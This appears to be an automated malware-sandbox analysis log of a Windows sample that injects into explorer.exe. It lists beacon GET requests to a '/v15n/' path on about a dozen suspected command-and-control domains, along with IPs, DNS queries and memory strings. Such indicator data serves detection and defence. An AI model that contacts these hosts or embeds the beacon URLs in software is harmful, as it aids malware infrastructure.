Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=l6h8+VCDejd8UaCGuBR/7TFLPGuM6ZnUcFM6cLRiUyTDZ3KSnL9/KZomame6k6rf6Ttt&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.hatesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.dnwgt80508yoec8pzq.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 10_2_10A36F82 getaddrinfo,setsockopt,recv,

10_2_10A36F82

Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXQXM/YhbITnk&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.mirotcg.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=AGM8cYat7abGFPmKwezZqVwW1aBQQM3PRq0t0OO3Vqk/+tNsWTohgGYaGZGPsfo13B1a&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.mpo525.monsterConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.vicmvm649n.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=TZ7dEV+dePhm1jul6DRI/086qPMy6e3XQqPVR8kv79G9dLkwb8ABVO+elO8aT8i2Z4Zj&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.go4stores.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=l6h8+VCDejd8UaCGuBR/7TFLPGuM6ZnUcFM6cLRiUyTDZ3KSnL9/KZomame6k6rf6Ttt&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.hatesa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.dnwgt80508yoec8pzq.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.mirotcg.info
Source: global traffic	DNS traffic detected: DNS query: www.dyahwoahjuk.store
Source: global traffic	DNS traffic detected: DNS query: www.mpo525.monster
Source: global traffic	DNS traffic detected: DNS query: www.vicmvm649n.top
Source: global traffic	DNS traffic detected: DNS query: www.go4stores.com
Source: global traffic	DNS traffic detected: DNS query: www.hatesa.xyz
Source: global traffic	DNS traffic detected: DNS query: www.turbo3club.site
Source: global traffic	DNS traffic detected: DNS query: www.agenkilat-official.space
Source: global traffic	DNS traffic detected: DNS query: www.visualvarta.com
Source: global traffic	DNS traffic detected: DNS query: www.nijssenadventures.com
Source: global traffic	DNS traffic detected: DNS query: www.dnwgt80508yoec8pzq.top
Source: global traffic	DNS traffic detected: DNS query: www.kapalwin.live

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcontent-length: 151server: Apacheconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 31 35 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v15n/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Aug 2024 06:51:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Aug 2024 06:52:14 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MSBvQOPbXvNXL0hjLZMNmoNcvwIskt8wDiQH2szSVox0i1MqaL82KGN7jhvS5C1dEXSXNhqfkUPFSjdT3b9Enzb8WHzcL4mkWc1WBCZfS3jGmGgSffNEL6%2BnZ5pZ89a%2Bwcs%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=10.999918X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8ae4dca3ec6a4291-EWRalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta c

Source: explorer.exe, 0000000A.00000002.4483326842.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: CZyOWoN2hiszA6d.exe, dacYzRiJuWECy.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CZyOWoN2hiszA6d.exe, dacYzRiJuWECy.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 0000000A.00000002.4473768693.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2048449810.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 0000000A.00000002.4483326842.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000A.00000002.4483326842.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: CZyOWoN2hiszA6d.exe, dacYzRiJuWECy.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 0000000A.00000002.4483326842.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000A.00000000.2074669355.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000A.00000002.4482361431.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2071717065.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2070443349.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2046045143.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, dacYzRiJuWECy.exe, 0000000B.00000002.2104588083.00000000026AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agenkilat-official.space
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agenkilat-official.space/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agenkilat-official.space/v15n/www.visualvarta.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.agenkilat-official.spaceReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.culturamosaica.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.culturamosaica.com/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.culturamosaica.com/v15n/www.gtur.top
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.culturamosaica.comReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dnwgt80508yoec8pzq.top
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dnwgt80508yoec8pzq.top/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dnwgt80508yoec8pzq.top/v15n/www.kapalwin.live
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dnwgt80508yoec8pzq.topReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dyahwoahjuk.store
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dyahwoahjuk.store/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dyahwoahjuk.store/v15n/www.mpo525.monster
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dyahwoahjuk.storeReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go4stores.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go4stores.com/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go4stores.com/v15n/www.hatesa.xyz
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.go4stores.comReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtur.top
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtur.top/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtur.top/v15n/S
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gtur.topReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hatesa.xyz
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hatesa.xyz/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hatesa.xyz/v15n/www.turbo3club.site
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hatesa.xyzReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapalwin.live
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapalwin.live/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapalwin.live/v15n/www.merrycleanteam.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapalwin.liveReferer:
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kurainu.xyz
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kurainu.xyz/v15n/
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kurainu.xyz/v15n/www.culturamosaica.com
Source: explorer.exe, 0000000A.00000003.3094428795.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3810947116.000000000C9EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4488942864.000000000C9F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3811957148.000000000C9F4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kurainu.xyzReferer:
